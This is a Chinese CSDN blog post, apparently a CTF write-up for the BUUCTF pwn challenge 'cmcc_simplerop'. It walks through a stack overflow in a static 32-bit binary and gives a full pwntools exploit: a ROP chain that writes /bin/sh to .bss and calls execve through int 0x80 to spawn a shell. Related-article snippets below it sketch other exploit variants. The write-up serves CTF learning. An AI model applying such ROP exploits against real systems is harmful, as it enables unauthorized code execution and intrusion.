cmcc_simplerop

最新推荐文章于 2024-08-02 16:59:58 发布
最新推荐文章于 2024-08-02 16:59:58 发布
阅读量416 收藏
点赞数
分类专栏: BUU-PWN 文章标签: pwn 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/121602769
版权

cmcc_simplerop

使用checksec查看:
在这里插入图片描述
嗯,只开了栈不可执行,题目已经提示是漏洞是栈溢出了。

直接放进IDA中查看:
在这里插入图片描述
很简洁,直接在主函数中给出了栈溢出的地方。

接着查看了该程序的字符串,发现这是一个静态编译的程序,而且不存在flag/bin/sh等关键字符串。

看来是不能直接getshell。但是可以发现存在int 80,这么一来,可以执行系统调用了。
在这里插入图片描述
接下来就是我们需要找一些通用的可以给寄存器赋值的命令。
在这里插入图片描述
so…因为系统调用,需要我们执行这样的命令:int80(11,"/bin/sh",null,null)
在这里插入图片描述
在这里插入图片描述
所以上面的两条命令刚刚好。

接下来就是要解决/bin/sh的问题,这道题目没有给出字符串,需要我们自己输入,这道题没有开启pie,可以考虑用read()/bin/sh写入到bss段中。

这里还有个坑,IDA中给出的距离ebp的地址是0x14,打了好几次发现不行,用gdb调试了下才发现距离是0x1c
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DGBITvPX-1638149868932)(cmcc_simplerop.assets/image-20211019232657675.png)]

payload = b'M'*(0x1c+4) + p32(read_addr) + p32(pop_pop_edx_ecx_ebx) + p32(0) + p32(binsh_addr) + p32(0x8)
payload += p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh_addr) + p32(int_addr)

第一段payload是将/bin/sh写入BSS段,read函数的返回地址用三个pop代替,整好将read函数的三个参数弹出栈,这样就可以执行下面的系统调用了。

第二段就是正常的执行系统调用。

exp:

from pwn import *

#start 
r = process("../buu/cmcc_simplerop")
# r = remote("node4.buuoj.cn",27434)
elf = ELF("../buu/cmcc_simplerop")

#params 
int_80 = 0x80493e1
pop_eax = 0x80bae06
read_addr = 0x0806CD50
binsh_addr = 0x080EB584
pop_edx_ecx_ebx = 0x0806e850

payload = b'M'*(0x1c+4) + p32(read_addr) + p32(pop_edx_ecx_ebx) + p32(0) + p32(binsh_addr) + p32(0x8) + p32(pop_eax) + p32(0xb) + p32(pop_edx_ecx_ebx) + p32(0) + p32(0) + p32(binsh_addr) + p32(int_80)

#attack
r.sendline(payload)
r.sendline('/bin/sh\x00')

r.interactive()
m0sway
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF cmcc_simplerop
BengDouLove的博客
04-14 904
这道题打开ida又是那么一大堆一大堆的函数,也没有外部引用的段,所以就是静态链接把好多函数都链接进来了 所以就和 BUU上另一道 inndy_rop 一样,直接用ROPgadget 去找rop链 from struct import pack # Padding goes here p = '' p += pack('<I', 0x0806e82a) # pop edx ...
pwncmcc_simplerop
Nothing
02-26 729
例行检查 ida打开二进制文件发现是静态链接的32位程序。main函数中存在溢出。用ROPgadget查找文件中的gadget。 ROPgadget --binary ./simplerop --only 'pop|ret' >> 1.txt 得到 发现存在 pop eax;ret pop edx;pop ecx;pop ebx;ret 这些就足够了,给寄存器赋值再用int 80...
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 471
[BUUCTF-pwn]——cmcc_simplerop 有栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
buuctf cmcc_simplerop
qq_42728977的博客
04-11 291
系统调用+rop https://www.cnblogs.com/bhxdn/p/12330142.html https://blog.csdn.net/xiaominthere/article/details/17287965
cmcc_simplerop的wp
wuyvle的博客
03-06 348
函数很多很唬人 但确实不难,很明显要溢出 用ROP看看有没有int80 有,我们可以利用系统调用 再用ROp找找看 就这俩了 int80(11,"/bin/sh",null,null) 后面的四个参数分别是eax、ebx、ecx、edx。 所以上面的两条命令刚刚好。 没有/bin/sh就用read在bss段上写一个 1 from pwn import * 2 3 p = process('./simplerop') 4 context.log_level = 'debug' 5 6 p
cmcc_simplerop解题过程
weixin_55013445的博客
09-24 201
cmcc_simplerop解题流程
BUUCTF----cmcc_simplerop
qq_33010875的博客
09-28 382
环境:WSL2,ubuntu16.04,python2 常规checksec文件: ida反编译: 明显看到read函数会导致栈溢出 gdb调试程序: 用cyclic指令生成100个数字,运行程序: 求输入点到返回地址的偏移: 得到偏移是32,即0x20 值得一提的是,在ida中,我们可以看到偏移是0x18+0x04=0x1c,以gdb调试为准 原因可参考: https://blog.csdn.net/mcmuyanga/article/details/109260008 文件名给了提示,使用
BUUCTF:cmcc_simplerop(write up)
qq_44768749的博客
08-26 790
BUUCTF:cmcc_simplerop0x01 文件分析0x02 运行0x03 IDA0x04 思路0x04-1 解法一0x04-2 解法二0x05 exp解法一解法二 0x01 文件分析 32位程序,开启NX、部分RELRO保护 0x02 运行 输入一串字符串 0x03 IDA main函数 存在栈溢出漏洞 0x04 思路 0x04-1 解法一 该题没有system函数也没有"/bin/sh",也无法泄露函数真实地址 可利用int 80h系统调用 设置系统调用参数即可执行e
BUUCTF-PWN-cmcc_simplerop
qq_41743240的博客
04-28 486
BUUCTF-cmcc_simplerop 开了NX IDA反编译 程序非常简单,漏洞也一眼可见 程序里面没有system,这题解法非常多,这里使用mprotect方法修改bss段,执行shellcode exploit: #coding:utf-8 from pwn import * #p=process('simplerop') p=remote('node3.b...
Amigo_CMCC_Anjian.rar_Amigo_CMCC_Anji_UltraEdit_飞信
09-21
飞信 无UltraEdit-32 UltraEdit-32
SCH-MSM8909_MAIN BOARD_CMCC_PVT_A
03-23
【标题】"SCH-MSM8909_MAIN BOARD_CMCC_PVT_A" 指的是一款基于高通骁龙MSM8909处理器的主板设计,主要用于中国移动通讯公司的定制产品。这个标题暗示了这是一个针对特定运营商的、经过私有化验证的主板设计方案。 ...
CMCC_cn_iPhone-15.5
05-20
移动运营商文件 CMCC_cn_iPhone-15.5
Cmcc.rar_cmcc_cmcc-edu_cmccgz_中国移动WLAN_自动登录
09-21
【标题】"Cmcc.rar_cmcc_cmcc-edu_cmccgz_中国移动WLAN_自动登录" 提供的信息主要涉及到中国移动的WLAN网络服务以及一个用于自动登录的程序。这个程序设计的目的是为了方便用户在支持中国移动WLAN网络的区域快速、...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8360
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
鸿蒙系统开发【加解密】安全
2301_76813281的博客
08-02 468
本示例使用cryptoFramework接口的Cipher对象相关方法实现了字符串加解密算法,包括RSA加密算法与AES加密算法。
鸿蒙系统开发【加解密算法库框架】安全
最新发布
2301_76813281的博客
08-02 439
本示例使用@ohos.security.cryptoFramework相关接口实现了对文本文件的加解密、签名验签操作。
发送邮箱调用接口时需要注意哪些安全事项?
DengHua2203的博客
08-02 191
发送邮箱调用接口时,确保安全性是一个复杂而重要的任务。通过以上措施,可以显著提高接口的安全性。AokSend,发送邮箱调用接口,API与SMTP无缝对接,一键触发,邮件秒达,营销快人一步!
CMCC LTE外场测试指南:注意事项与操作详解
本资源是一份关于CMCC LTE Single USIM Dual Standby Handset的外场测试操作指南,由HuiyueWCX公司内部使用。该文档详细地涵盖了在实际测试过程中应注意的关键事项和所需设备的操作步骤。主要分为三个部分: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值